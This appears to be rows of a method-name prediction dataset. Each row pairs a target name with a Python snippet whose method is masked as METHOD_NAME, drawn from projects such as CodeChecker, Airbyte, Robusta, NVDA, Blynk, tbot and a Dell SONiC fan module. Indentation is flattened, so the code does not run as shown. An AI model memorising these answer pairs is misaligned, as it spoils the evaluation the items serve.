for storage in request.files.values():
path = safe_filename(storage.filename, default="upload")
path = upload_dir.joinpath(path)
storage.save(str(path))
content_hash = archive.archive_file(path)
document = Document.save(
collection=collection,
parent=parent,
foreign_id=foreign_id,
content_hash=content_hash,
meta=meta,
role_id=request.authz.id,
)
collection.touch()
db.session.commit()
proxy = document.to_proxy(ns=collection.ns)
if proxy.schema.is_a(Document.SCHEMA_FOLDER) and sync and index:
index_proxy(collection, proxy, sync=sync)
ingest_flush(collection, entity_id=proxy.id)
ingest_entity(collection, proxy, job_id=job_id, index=index)
_notify(collection, proxy.id)
return jsonify({"status": "ok", "id": proxy.id}, status=201)
finally:
shutil.rmtree(upload_dir) | null |
ctu mapping | # -------------------------------------------------------------------------
#
# Part of the CodeChecker project, under the Apache License v2.0 with
# LLVM Exceptions. See LICENSE for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
#
# -------------------------------------------------------------------------
"""
Clang Static Analyzer related functions.
"""
import os
import subprocess
from codechecker_common.logger import get_logger
from codechecker_analyzer import host_check
from codechecker_analyzer.analyzers.clangsa import version
LOG = get_logger('analyzer.clangsa')
CTU_ON_DEMAND_OPTION_NAME = 'ctu-invocation-list'
def METHOD_NAME(clang_version_info):
"""Clang version dependent ctu mapping tool path and mapping file name.
The path of the mapping tool, which is assumed to be located
inside the installed directory of the analyzer. Certain binary
distributions can postfix the tool name with the major version
number, the number and the tool name being separated by a dash. By
default the shorter name is looked up, then if it is not found the
postfixed.
"""
if not clang_version_info:
LOG.debug("No clang version information."
"Can not detect ctu mapping tool.")
return None, None
old_mapping_tool_name = 'clang-func-mapping'
old_mapping_file_name = 'externalFnMap.txt'
new_mapping_tool_name = 'clang-extdef-mapping'
new_mapping_file_name = 'externalDefMap.txt'
major_version = clang_version_info.major_version
if major_version > 7:
tool_name = new_mapping_tool_name
mapping_file = new_mapping_file_name
else:
tool_name = old_mapping_tool_name
mapping_file = old_mapping_file_name
installed_dir = clang_version_info.installed_dir
tool_path = os.path.join(installed_dir, tool_name)
if os.path.isfile(tool_path):
return tool_path, mapping_file
LOG.debug(
"Mapping tool '%s' suggested by autodetection is not found in "
"directory reported by Clang '%s'. Trying with version-postfixed "
"filename...", tool_path, installed_dir)
postfixed_tool_path = ''.join([tool_path, '-', str(major_version)])
if os.path.isfile(postfixed_tool_path):
return postfixed_tool_path, mapping_file
LOG.debug(
"Postfixed mapping tool '%s' suggested by autodetection is not "
"found in directory reported by Clang '%s'.",
postfixed_tool_path, installed_dir)
return None, None
def invoke_binary_checked(binary_path, args=None, environ=None):
"""
Invoke the binary with the specified args, and return the output if the
command finished running with zero exit code. Return False otherwise.
Possible usage can be used to check the existence binaries.
:param binary_path: The path to the executable to invoke
:param args: The arguments of the invocation
:type binary_path: str
:type args: list
:rtype str
"""
args = args or []
invocation = [binary_path]
invocation.extend(args)
try:
output = subprocess.check_output(
invocation,
env=environ,
encoding="utf-8",
errors="ignore")
except (subprocess.CalledProcessError, OSError) as e:
LOG.debug('Command invocation failed because of non-zero exit code!'
'Details: %s', str(e))
return False
return output
class CTUAutodetection:
"""
CTUAutodetection is responsible for providing the availability information
    of the CTU feature, the relevant mapping tool path and the mapping file
name.
"""
def __init__(self, analyzer_binary, environ):
self.__analyzer_binary = analyzer_binary
self.environ = environ
self.__analyzer_version_info = None
if self.__analyzer_binary is None:
LOG.debug(
'Trying to detect CTU capability, but analyzer binary is not '
'set!')
return None
analyzer_version = invoke_binary_checked(
self.__analyzer_binary, ['--version'], self.environ)
if analyzer_version is False:
LOG.debug('Failed to invoke command to get Clang version!')
return None
version_parser = version.ClangVersionInfoParser(self.__analyzer_binary)
version_info = version_parser.parse(analyzer_version)
if not version_info:
LOG.debug('Failed to parse Clang version information!')
return None
self.__analyzer_version_info = version_info
@property
def analyzer_version_info(self):
"""
Returns the relevant parameters of the analyzer by parsing the
        output of the analyzer binary when called with the version flag.
"""
if not self.__analyzer_version_info:
return False
return self.__analyzer_version_info
@property
def major_version(self):
"""
Returns the major version of the analyzer, which is used for
CTU analysis.
"""
return self.analyzer_version_info.major_version
@property
def installed_dir(self):
"""
Returns the installed directory of the analyzer, which is used for
CTU analysis.
"""
return self.analyzer_version_info.installed_dir
@property
def mapping_tool_path(self):
"""Return the path to the mapping tool."""
tool_path, _ = METHOD_NAME(self.analyzer_version_info)
if tool_path:
return tool_path
return False
@property
def display_progress(self):
"""
Return analyzer args if it is capable to display ctu progress.
Returns None if the analyzer can not display ctu progress.
The ctu display progress arguments depend on
the clang analyzer version.
"""
if not self.analyzer_version_info:
return None
ctu_display_progress_args = ['-Xclang',
'-analyzer-config',
'-Xclang',
'display-ctu-progress=true']
ok = host_check.has_analyzer_config_option(
self.__analyzer_binary, "display-ctu-progress")
if not ok:
return None
return ctu_display_progress_args
@property
def mapping_file_name(self):
"""
        Returns the name of the mapping file used for CTU analysis.
"""
_, mapping_file_name = METHOD_NAME(self.analyzer_version_info)
if mapping_file_name:
return mapping_file_name
return False
@property
def is_ctu_capable(self):
"""
Detects if the current clang is CTU compatible. Tries to autodetect
the correct one based on clang version.
"""
tool_path = self.mapping_tool_path
if not tool_path:
return False
return invoke_binary_checked(tool_path, ['-version'], self.environ) \
is not False
@property
def is_on_demand_ctu_available(self):
"""
Detects if the current Clang supports on-demand parsing of ASTs for
CTU analysis.
"""
analyzer_options = invoke_binary_checked(
self.__analyzer_binary, ['-cc1', '-analyzer-config-help'],
self.environ)
if analyzer_options is False:
return False
return CTU_ON_DEMAND_OPTION_NAME in analyzer_options | null |
read profiles yml | #
# Copyright (c) 2023 Airbyte, Inc., all rights reserved.
#
import argparse
import os
from typing import Any, Dict
import yaml
from normalization.destination_type import DestinationType
from normalization.transform_catalog.catalog_processor import CatalogProcessor
class TransformCatalog:
"""
To run this transformation:
```
python3 main_dev_transform_catalog.py \
      --integration-type <postgres|bigquery|redshift|snowflake> \
--profile-config-dir . \
--catalog integration_tests/catalog.json \
--out dir \
--json-column json_blob
```
"""
config: dict = {}
DBT_PROJECT = "dbt_project.yml"
def __init__(self):
self.config = {}
def run(self, args) -> None:
self.parse(args)
self.process_catalog()
def parse(self, args) -> None:
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument("--integration-type", type=str, required=True, help="type of integration dialect to use")
parser.add_argument("--profile-config-dir", type=str, required=True, help="path to directory containing DBT profiles.yml")
parser.add_argument("--catalog", nargs="+", type=str, required=True, help="path to Catalog (JSON Schema) file")
parser.add_argument("--out", type=str, required=True, help="path to output generated DBT Models to")
parser.add_argument("--json-column", type=str, required=False, help="name of the column containing the json blob")
parsed_args = parser.parse_args(args)
profiles_yml = METHOD_NAME(parsed_args.profile_config_dir)
self.config = {
"integration_type": parsed_args.integration_type,
"schema": extract_schema(profiles_yml),
"catalog": parsed_args.catalog,
"output_path": parsed_args.out,
"json_column": parsed_args.json_column,
"profile_config_dir": parsed_args.profile_config_dir,
}
def process_catalog(self) -> None:
destination_type = DestinationType.from_string(self.config["integration_type"])
schema = self.config["schema"]
output = self.config["output_path"]
json_col = self.config["json_column"]
processor = CatalogProcessor(output_directory=output, destination_type=destination_type)
for catalog_file in self.config["catalog"]:
print(f"Processing {catalog_file}...")
processor.process(catalog_file=catalog_file, json_column_name=json_col, default_schema=schema)
self.update_dbt_project_vars(json_column=self.config["json_column"], models_to_source=processor.models_to_source)
def update_dbt_project_vars(self, **vars_config: Dict[str, Any]):
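        # Merge the given variables into the `vars` section of dbt_project.yml
        # and write the updated config back to disk.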
filename = os.path.join(self.config["profile_config_dir"], self.DBT_PROJECT)
config = read_yaml_config(filename)
config["vars"] = {**config.get("vars", {}), **vars_config}
write_yaml_config(config, filename)
def METHOD_NAME(profile_dir: str) -> Any:
with open(os.path.join(profile_dir, "profiles.yml"), "r") as file:
config = yaml.load(file, Loader=yaml.FullLoader)
obj = config["normalize"]["outputs"]["prod"]
return obj
def read_yaml_config(filename: str) -> Dict[str, Any]:
with open(filename, "r") as fp:
config = yaml.safe_load(fp)
if not isinstance(config, dict):
raise RuntimeError("{} does not parse to a dictionary".format(os.path.basename(filename)))
return config
def write_yaml_config(config: Dict[str, Any], filename: str):
with open(filename, "w") as fp:
fp.write(yaml.dump(config, sort_keys=False))
def extract_schema(profiles_yml: Dict) -> str:
if "dataset" in profiles_yml:
return str(profiles_yml["dataset"])
elif "schema" in profiles_yml:
return str(profiles_yml["schema"])
else:
raise KeyError("No Dataset/Schema defined in profiles.yml")
def extract_path(profiles_yml: Dict) -> str:
if "path" in profiles_yml:
return str(profiles_yml["path"])
else:
raise KeyError("No destination_path defined in profiles.yml")
def main(args=None):
TransformCatalog().run(args) | null |
from db row | from datetime import datetime
from typing import Dict, List, Optional, Union
from hikaru.model.rel_1_26 import Job
from kubernetes.client import V1Container, V1Job, V1JobSpec, V1JobStatus, V1PodSpec
from pydantic import BaseModel
from robusta.core.discovery import utils
from robusta.core.model.pods import ContainerResources, ResourceAttributes
SERVICE_TYPE_JOB = "Job"
class JobContainer(BaseModel):
image: str
cpu_req: float
cpu_limit: float
mem_req: int
mem_limit: int
@staticmethod
def from_api_server(container: V1Container) -> "JobContainer":
requests: ContainerResources = utils.container_resources(container, ResourceAttributes.requests)
limits: ContainerResources = utils.container_resources(container, ResourceAttributes.limits)
return JobContainer(
image=container.image,
cpu_req=requests.cpu,
cpu_limit=limits.cpu,
mem_req=requests.memory,
mem_limit=limits.memory,
)
class JobCondition(BaseModel):
type: str
message: Optional[str]
class JobStatus(BaseModel):
active: int = 0
failed: int = 0
succeeded: int = 0
completion_time: Optional[str]
failed_time: Optional[str]
conditions: List[JobCondition]
@staticmethod
def from_api_server(job: Union[V1Job, Job]) -> "JobStatus":
job_status: V1JobStatus = job.status
job_conditions: List[JobCondition] = [
JobCondition(type=condition.type, message=condition.message)
for condition in (job_status.conditions or [])
if condition.status.lower() == "true"
]
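        # Attribute names differ between the kubernetes client (snake_case)
        # and hikaru models (camelCase), so try both spellings.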
completion_time = getattr(job_status, "completion_time", None) or getattr(job_status, "completionTime", None)
return JobStatus(
active=job_status.active or 0,
failed=job_status.failed or 0,
succeeded=job_status.succeeded or 0,
completion_time=str(completion_time),
conditions=job_conditions,
failed_time=str(JobStatus._extract_failed_time(job_status)),
)
@staticmethod
def _extract_failed_time(job_status: V1JobStatus) -> Optional[datetime]:
try:
for condition in job_status.conditions:
if condition.status.lower() == "true" and condition.type == "Failed":
return getattr(condition, "last_transition_time", None) or getattr(
condition, "lastTransitionTime", None
)
except (
AttributeError,
TypeError,
): # if a field is missing
return None
class JobData(BaseModel):
backoff_limit: int
tolerations: Optional[List[Dict]]
node_selector: Optional[Dict]
labels: Optional[Dict[str, str]]
containers: List[JobContainer]
pods: Optional[List[str]]
parents: Optional[List[str]]
@staticmethod
def _get_job_parents(job: Union[V1Job, Job]) -> List[str]:
try:
owner_references = getattr(job.metadata, "owner_references", []) or getattr(
job.metadata, "ownerReferences", []
)
return [owner_ref.name for owner_ref in owner_references]
except Exception:
return []
@staticmethod
def from_api_server(job: Union[V1Job, Job], pods: List[str]) -> "JobData":
job_spec: V1JobSpec = job.spec
pod_spec: V1PodSpec = job_spec.template.spec
pod_containers: List[JobContainer] = [
JobContainer.from_api_server(container) for container in pod_spec.containers
]
backoff_lim = job_spec.backoff_limit if hasattr(job_spec, "backoff_limit") else job_spec.backoffLimit
return JobData(
backoff_limit=backoff_lim,
tolerations=[toleration.to_dict() for toleration in (pod_spec.tolerations or [])],
node_selector=getattr(pod_spec, "node_selector", {}) or getattr(pod_spec, "nodeSelector", {}),
labels=job.metadata.labels,
containers=pod_containers,
pods=pods,
parents=JobData._get_job_parents(job),
)
class JobInfo(BaseModel):
name: str
namespace: str
type: str = SERVICE_TYPE_JOB
created_at: str
deleted: bool = False
cpu_req: float
mem_req: int
completions: int
status: JobStatus
job_data: JobData
def get_service_key(self) -> str:
return f"{self.namespace}/{self.type}/{self.name}"
def __eq__(self, other):
if not isinstance(other, JobInfo):
return NotImplemented
        return (  # created_at is ignored because date formats differ
self.name == other.name
and self.namespace == other.namespace
and self.deleted == other.deleted
and self.cpu_req == other.cpu_req
and self.mem_req == other.mem_req
and self.completions == other.completions
and self.status == other.status
and self.job_data == other.job_data
)
@staticmethod
def METHOD_NAME(job: dict) -> "JobInfo":
return JobInfo(
name=job["name"],
namespace=job["namespace"],
created_at=job["created_at"],
deleted=job["deleted"],
cpu_req=job["cpu_req"],
mem_req=job["mem_req"],
completions=job["completions"],
status=JobStatus(**job["status"]),
job_data=JobData(**job["job_data"]),
)
@staticmethod
def from_api_server(job: Union[V1Job, Job], pods: List[str]) -> "JobInfo":
containers = job.spec.template.spec.containers
requests: ContainerResources = utils.containers_resources_sum(containers, ResourceAttributes.requests)
status = JobStatus.from_api_server(job)
job_data = JobData.from_api_server(job, pods)
completions = job.spec.completions if job.spec.completions is not None else 1
creation_ts = getattr(job.metadata, "creation_timestamp", None) or getattr(
job.metadata, "creationTimestamp", None
)
return JobInfo(
name=job.metadata.name,
namespace=job.metadata.namespace,
created_at=str(creation_ts),
cpu_req=requests.cpu,
mem_req=requests.memory,
completions=completions,
status=status,
job_data=job_data,
) | null |
is hankaku katakana | # coding: UTF-8
# _checkCharDesc.py
# A part of NonVisual Desktop Access (NVDA)
# Copyright (C) 2012,2023 Takuya Nishimoto, NVDA Japanese Team
import re, codecs
from getord import getOrd
LOCALE_JA = r"..\source\locale\ja"
SY_FILE = LOCALE_JA + r"\symbols.dic"
CH_FILE = LOCALE_JA + r"\characterDescriptions.dic"
CS_FILE = LOCALE_JA + r"\characters.dic"
def read_symbol_file(sy_file, returnSource=False, raiseDuplicated=True):
src = []
with codecs.open(sy_file, encoding="utf-8") as sy:
mode = None
ar = {}
c = 0
for line in sy:
c += 1
line = line.rstrip()
if line == "complexSymbols:":
mode = 1
src.append(line)
continue
if line == "symbols:":
mode = 2
src.append(line)
continue
if len(line) == 0:
src.append(line)
continue
if line[0] == "#":
src.append(line)
continue
if mode == 2:
a = line.split("\t")
if len(a) >= 2 and (len(a[0]) == 1 or a[0][0] == "\\"):
if ar.has_key(a[0]):
print(
"duplicated %04x %s (line %d and %d)"
% (ord(a[0]), a[0], ar[a[0]][0], c)
)
if raiseDuplicated:
raise Exception
key = a[0]
if key[0] == "\\":
key = key.decode("string_escape")[0]
s = "U+%04x" % ord(key)
ar[key] = [c, a[1].strip()]
# add comment field
if a[-1][0] == "#":
# delete existing 'U+xxxx' string
a[-1] = re.sub(r" U\+[0-9a-f]{4}", "", a[-1])
a[-1] += " " + s
else:
a.append("# %s %s" % (key, s))
line = "\t".join(a)
src.append(line)
if returnSource:
return ar, src
return ar
def read_chardesc_file(ch_file):
with codecs.open(ch_file, encoding="utf-8") as ch:
ar = {}
c = 0
for line in ch:
c += 1
line = line.rstrip()
if len(line) == 0:
continue
if line[0] == "#":
continue
if line[0:2] == "\\#":
line = "#" + line[2:]
a = line.split("\t")
if len(a) >= 2:
ar[a[0]] = [c, a[1]]
return ar
def read_characters_file(cs_file, use_both=False):
count = 0
with codecs.open(cs_file, encoding="utf-8") as ch:
ar = {}
c = 0
for line in ch:
c += 1
line = line.rstrip()
if len(line) == 0:
continue
if line[0] == "#":
continue
if line[0:2] == "\\#":
line = "#" + line[2:]
a = line.split("\t")
if len(a) >= 4:
if use_both:
ar[a[0]] = [
c,
a[2].replace("[", "").replace("]", "") + " * " + a[3],
]
else:
ar[a[0]] = [c, a[3]]
count += 1
return ar
def print_diff(sy, ch):
for k, v in ch.items():
if k in sy:
if v[1] == sy[k][1]:
continue
print("ch %d %s %s / sy %d %s" % (v[0], k, v[1], sy[k][0], sy[k][1]))
C = re.compile("\s+")
def equals_ignore_spaces(s1, s2):
s1 = C.sub("", s1)
s2 = C.sub("", s2)
if s1 == s2:
return True
return False
def print_different(sy, ch, skip_included=False, report_included=False):
ar = {}
for k, v in ch.items():
if k in sy:
s1 = v[1]
s2 = sy[k][1]
if equals_ignore_spaces(s1, s2):
continue
if skip_included:
                # Skip if one reading is contained in the other
if (s1 in s2) or (s2 in s1):
if report_included:
print("included %04x ch %s / sy %s" % (ord(k), s1, s2))
continue
                # Remove 'セン' and skip if one is contained in the other
s1_ = s1.replace("セン", "")
s2_ = s2.replace("セン", "")
if (s1_ in s2_) or (s2_ in s1_):
if report_included:
print("included %04x ch %s / sy %s" % (ord(k), s1, s2))
continue
                # Remove 'ノ ナカニ' and skip if one is contained in the other
s1_ = s1.replace("ノ ナカニ", "")
s2_ = s2.replace("ノ ナカニ", "")
if (s1_ in s2_) or (s2_ in s1_):
if report_included:
print("included %04x ch %s / sy %s" % (ord(k), s1, s2))
continue
                # Remove spaces and skip if one is contained in the other
s1_ = s1.replace(" ", "")
s2_ = s2.replace(" ", "")
if (s1_ in s2_) or (s2_ in s1_):
if report_included:
print("included %04x ch %s / sy %s" % (ord(k), s1, s2))
continue
output = "%04x sy %d %s / ch %d %s %s" % (
ord(k),
sy[k][0],
sy[k][1],
v[0],
k,
v[1],
)
ar[sy[k][0]] = output
for s in sorted(ar.items(), key=lambda x: int(x[0])):
print(s[1])
def find_desc_duplicate(ch, skipKeisen=True, skipEmoji=True):
for k, v in ch.items():
for k2, v2 in ch.items():
if skipKeisen and ("ケイセン" in v[1] or "ケイセン" in v2[1]):
continue
if skipEmoji and ("エモジ" in v[1] or "エモジ" in v2[1]):
continue
assert isinstance(v[0], int) or isinstance(v[0], str)
assert isinstance(v2[0], int) or isinstance(v2[0], str)
if (
type(v[0]) == type(v2[0]) == int
and v[0] < v2[0]
and k != k2
and equals_ignore_spaces(v[1], v2[1])
):
print(
"ch %d:%s %04x / %d:%s %04x / %s"
% (v[0], k, getOrd(k), v2[0], k2, getOrd(k2), v2[1])
)
def isZenkakuKatakana(c):
return re.search(r"[ァ-ヾ]", c) is not None
def METHOD_NAME(c):
return re.search(r"[ヲ-ン]", c) is not None
def isHalfShape(c):
c = c[0:1]
return (32 < ord(c)) and (ord(c) < 128)
def add_katakana_prefix_to_characters(ch):
ar = {}
for k, v in ch.items():
if isZenkakuKatakana(k):
v = "カタカナ " + str(v)
elif METHOD_NAME(k):
v = "ハンカクカタカナ " + str(v)
elif k.isupper():
v = "オオモジ " + str(v)
elif isHalfShape(k):
v = "ハンカク " + str(v)
ar[k] = v
return ar | null |
writethread | #!/usr/bin/python
'''
This is a pseudo-server that sends predefined pattern to any connected client.
It is used to test transport behaviour and throughput.
If you want to use it with a sketch, connect your PC and Blynk-enabled device
into the same network and configure Blynk to connect to this pseudo-server:
IPAddress serv(192,168,0,105); // IP address of your PC
Blynk.begin(auth, serv, 8888);
Author: Volodymyr Shymanskyy
License: The MIT license
'''
import select, socket, struct
import os, sys, time, getopt
from threading import Thread
# Configuration options
# Parse command line options
try:
opts, args = getopt.getopt(sys.argv[1:],
"hb:p:",
["help", "bind=", "port=", "sndbuf=", "rcvbuf=", "nodelay", "sleep=", "qty=", "freq=", "pin=", "dump"])
except getopt.GetoptError:
print >>sys.stderr, __doc__
sys.exit(2)
# Default options
HOST = '' # Bind to all interfaces
PORT = 8888 # Bind to port 8888
NODELAY = 0 # No TCP_NODELAY
SNDBUF = 0 # No SNDBUF override
RCVBUF = 0 # No RCVBUF override
MSG_QTY = 10 # Amount of messages
SLEEP = 1.0 # Wait some time between IO
HW_PIN = "A0" # Pin #
DUMP = 0
for o, v in opts:
if o in ("-h", "--help"):
print __doc__
sys.exit()
elif o in ("-b", "--bind"):
HOST = v
elif o in ("-p", "--port"):
PORT = int(v)
elif o in ("--sndbuf",):
SNDBUF = int(v)
elif o in ("--rcvbuf",):
RCVBUF = int(v)
elif o in ("--nodelay",):
NODELAY = 1
elif o in ("--sleep",):
SLEEP = float(v)
elif o in ("--freq",):
SLEEP = 1.0/float(v)
elif o in ("--qty",):
MSG_QTY = int(v)
elif o in ("--pin",):
HW_PIN = int(v)
elif o in ("--dump",):
DUMP = 1
# Blynk protocol helpers
hdr = struct.Struct("!BHH")
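# "!BHH" = network byte order: 1-byte message type, 2-byte message id, 2-byte payload length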
class MsgType:
RSP = 0
LOGIN = 2
PING = 6
HW = 20
class MsgStatus:
OK = 200
def hw(*args):
# Convert params to string and join using \0
data = "\0".join(map(str, args))
dump("< " + " ".join(map(str, args)))
# Prepend HW command header
return hdr.pack(MsgType.HW, 1, len(data)) + data
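# For example, hw("ar", "A0") yields the 5-byte header "\x14\x00\x01\x00\x05"
# (type=20/HW, id=1, len=5) followed by the payload "ar\0A0" (illustrative).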
# Print utilities
start_time = time.time()
def log(msg):
print "[{:7.3f}] {:}".format(float(time.time() - start_time), msg)
draw_col = 0
def draw(c):
global draw_col
if not DUMP:
sys.stdout.write(c)
draw_col = (draw_col + 1) % 120
if draw_col:
sys.stdout.flush()
else:
sys.stdout.write("\n")
def dump(msg):
if DUMP:
log(msg)
def receive(sock, length):
d = []
l = 0
while l < length:
r = sock.recv(length-l)
if not r:
return ''
d.append(r)
l += len(r)
return ''.join(d)
# Threads
def readthread(conn, addr):
global msgs_in, authenticated
while(msgs_in < MSG_QTY):
data = receive(conn, hdr.size)
if not data:
break
msg_type, msg_id, msg_len = hdr.unpack(data)
#dump("Got {0}, {1}, {2}".format(msg_type, msg_id, msg_len))
if msg_type == MsgType.RSP:
pass
elif msg_type == MsgType.LOGIN:
auth = receive(conn, msg_len)
log("Auth {0}".format(auth))
# Send auth OK and pin modes
conn.sendall(hdr.pack(MsgType.RSP, msg_id, MsgStatus.OK))
conn.sendall(hw("pm", HW_PIN, "in"))
authenticated = True
elif msg_type == MsgType.PING:
log("Ping")
# Send Pong
conn.sendall(hdr.pack(MsgType.RSP, msg_id, MsgStatus.OK))
elif msg_type == MsgType.HW:
data = receive(conn, msg_len)
# Print HW messages (just for fun :)
draw('v')
dump("> " + " ".join(data.split("\0")))
msgs_in += 1
else:
log("Unknown msg type")
break
def METHOD_NAME(conn, addr):
global msgs_out, authenticated
while (msgs_out < MSG_QTY):
if authenticated:
conn.sendall(hw("ar", HW_PIN))
draw('.')
msgs_out += 1
time.sleep(SLEEP)
# Main code
serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# Set SO_REUSEADDR, this is needed to ignore WAIT state on next run
serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serv.bind((HOST, PORT))
except socket.error as msg:
log('Bind failed. Error Code: {0}, Msg: {1}'.format(str(msg[0]), msg[1]))
sys.exit()
serv.listen(1)
log('Listening on port %d' % PORT)
# Wait for clients
#while True:
conn, addr = serv.accept()
log('Connection from {0}:{1}'.format(addr[0], str(addr[1])))
if NODELAY != 0:
conn.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
if SNDBUF != 0:
sndbuf = conn.getsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF)
log('Default SNDBUF %s changed to %s' % (sndbuf, SNDBUF))
conn.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, SNDBUF)
if RCVBUF != 0:
rcvbuf = conn.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF)
log('Default RCVBUF %s changed to %s' % (rcvbuf, RCVBUF))
conn.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, RCVBUF)
proc_start = time.time()
msgs_in = 0
msgs_out = 0
authenticated = False
wt = Thread(target=METHOD_NAME, args=(conn, addr))
rt = Thread(target=readthread, args=(conn, addr))
wt.start()
rt.start()
wt.join()
rt.join()
draw("\n")
log("Time %3.4f" % (time.time() - proc_start))
log("Sent {0} messages".format(msgs_out))
log("Recv {0} messages".format(msgs_in))
conn.close() | null |
selftest path files | # tbot, Embedded Automation Tool
# Copyright (C) 2019 Harald Seiler
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
import typing
import stat
import tbot
import tbot.error
from tbot.machine import linux
from tbot.tc import selftest
__all__ = ["selftest_path_integrity", "selftest_path_stat", "selftest_path_files"]
@tbot.testcase
def selftest_path_integrity(lab: typing.Optional[selftest.SelftestHost] = None) -> None:
"""Test if using a path on the wrong host fails."""
with lab or selftest.SelftestHost() as lh:
p = lh.workdir / "folder" / "file.txt"
with tbot.acquire_lab() as lh2:
raised = False
try:
# mypy detects that this is wrong
lh2.exec0("echo", p) # type: ignore
except tbot.error.WrongHostError:
raised = True
assert raised
# It is ok to clone a machine and reuse the path
with lh.clone() as lh3:
lh3.exec0("echo", p)
lh.exec0("mkdir", "-p", p.parent)
assert p.parent.is_dir()
lh.exec0("uname", "-a", linux.RedirStdout(p))
assert p.is_file()
lh.exec0("rm", "-r", p.parent)
assert not p.exists()
assert not p.parent.exists()
@tbot.testcase
def selftest_path_stat(lab: typing.Optional[selftest.SelftestHost] = None) -> None:
"""Test path stat utilities."""
with lab or selftest.SelftestHost() as lh:
tbot.log.message("Setting up test files ...")
symlink = lh.workdir / "symlink"
if symlink.exists():
lh.exec0("rm", symlink)
lh.exec0("ln", "-s", "/proc/version", symlink)
fifo = lh.workdir / "fifo"
if fifo.exists():
lh.exec0("rm", fifo)
lh.exec0("mkfifo", fifo)
nonexistent = lh.workdir / "nonexistent"
if nonexistent.exists():
lh.exec0("rm", nonexistent)
# Block device
block_list = (
lh.exec0(
*["find", "/dev", "-type", "b"],
linux.Raw("2>/dev/null"),
linux.OrElse,
"true",
)
.strip()
.split("\n")
)
block_dev = None
        # an empty `find` result becomes [""] after strip/split, so check the first entry too
        if block_list and block_list[0]:
block_dev = linux.Path(lh, "/dev") / block_list[0]
# Existence checks
tbot.log.message("Checking existence ...")
assert not (lh.workdir / "nonexistent").exists()
assert symlink.exists()
# File mode checks
tbot.log.message("Checking file modes ...")
assert linux.Path(lh, "/dev").is_dir()
assert linux.Path(lh, "/proc/version").is_file()
assert symlink.is_symlink()
if block_dev is not None:
assert linux.Path(lh, block_dev).is_block_device()
assert linux.Path(lh, "/dev/tty").is_char_device()
assert fifo.is_fifo()
# File mode nonexistence checks
tbot.log.message("Checking file modes on nonexistent files ...")
assert not nonexistent.is_dir()
assert not nonexistent.is_file()
assert not nonexistent.is_symlink()
assert not nonexistent.is_block_device()
assert not nonexistent.is_char_device()
assert not nonexistent.is_fifo()
assert not nonexistent.is_socket()
stat_list = [
(linux.Path(lh, "/dev"), stat.S_ISDIR),
(linux.Path(lh, "/proc/version"), stat.S_ISREG),
(symlink, stat.S_ISLNK),
(linux.Path(lh, "/dev/tty"), stat.S_ISCHR),
(fifo, stat.S_ISFIFO),
]
if block_dev is not None:
stat_list.insert(3, (linux.Path(lh, block_dev), stat.S_ISBLK))
tbot.log.message("Checking stat results ...")
for p, check in stat_list:
assert check(p.stat().st_mode)
@tbot.testcase
def METHOD_NAME(lab: typing.Optional[selftest.SelftestHost] = None) -> None:
"""Test accessing file via the Path class"""
with lab or selftest.SelftestHost() as lh:
f = lh.workdir / "test-file.dat"
tbot.log.message("Testing text file access ...")
content = "This is a test file\nwith multiple lines.\n"
f.write_text(content)
output = f.read_text()
assert output == content, f"Sending {content!r} resulted in {output!r}"
tbot.log.message("Testing binary file access ...")
content_bin = b"\x00\x1b[m\x04\x01\x10"
assert f.write_bytes(content_bin) == len(content_bin), "Length mismatch"
output_bin = f.read_bytes()
assert (
output_bin == content_bin
), f"Sending {content_bin!r} resulted in {output_bin!r}"
tbot.log.message("Test reading/writing invalid file ...")
f = lh.workdir / "path-test.50278c53-3cfc-4983-9770-d571b29b3955"
# Writing/reading a directory should always fail
lh.exec0("mkdir", "-p", f)
raised = False
try:
f.write_text("Hello World\n")
except Exception:
raised = True
assert raised, "Writing invalid file supposedly succeeded (text mode)"
raised = False
try:
f.read_text()
except Exception:
raised = True
assert raised, "Reading invalid file supposedly succeeded (text mode)"
raised = False
try:
f.write_bytes(b"Hello World\n")
except Exception:
raised = True
assert raised, "Writing invalid file supposedly succeeded (binary mode)"
raised = False
try:
f.read_bytes()
except Exception:
raised = True
assert raised, "Reading invalid file supposedly succeeded (binary mode)" | null |
get presence | #!/usr/bin/env python
########################################################################
# DellEMC S5232F
#
# Module contains an implementation of SONiC Platform Base API and
# provides the Fans' information which are available in the platform.
#
########################################################################
try:
from sonic_platform_base.fan_base import FanBase
from sonic_platform.ipmihelper import IpmiSensor, IpmiFru
except ImportError as e:
raise ImportError(str(e) + "- required module not found")
FAN1_MAX_SPEED_OFFSET = 71
FAN2_MAX_SPEED_OFFSET = 73
PSU_FAN_MAX_SPEED_OFFSET = 50
FAN_DIRECTION_OFFSET = 69
PSU_FAN_DIRECTION_OFFSET = 47
class Fan(FanBase):
"""DellEMC Platform-specific Fan class"""
# { FAN-ID: { Sensor-Name: Sensor-ID } }
FAN_SENSOR_MAPPING = { 1: {"Prsnt": 0x53, "State": 0x57, "Speed": 0x24},
2: {"Prsnt": 0x53, "State": 0x5b, "Speed": 0x20},
3: {"Prsnt": 0x54, "State": 0x58, "Speed": 0x25},
4: {"Prsnt": 0x54, "State": 0x5c, "Speed": 0x21},
5: {"Prsnt": 0x55, "State": 0x59, "Speed": 0x26},
6: {"Prsnt": 0x55, "State": 0x5d, "Speed": 0x22},
7: {"Prsnt": 0x56, "State": 0x5a, "Speed": 0x27},
8: {"Prsnt": 0x56, "State": 0x5e, "Speed": 0x23} }
PSU_FAN_SENSOR_MAPPING = { 1: {"State": 0x31, "Speed": 0x28},
2: {"State": 0x32, "Speed": 0x29} }
# { FANTRAY-ID: FRU-ID }
FAN_FRU_MAPPING = { 1: 3, 2: 4, 3: 5, 4: 6 }
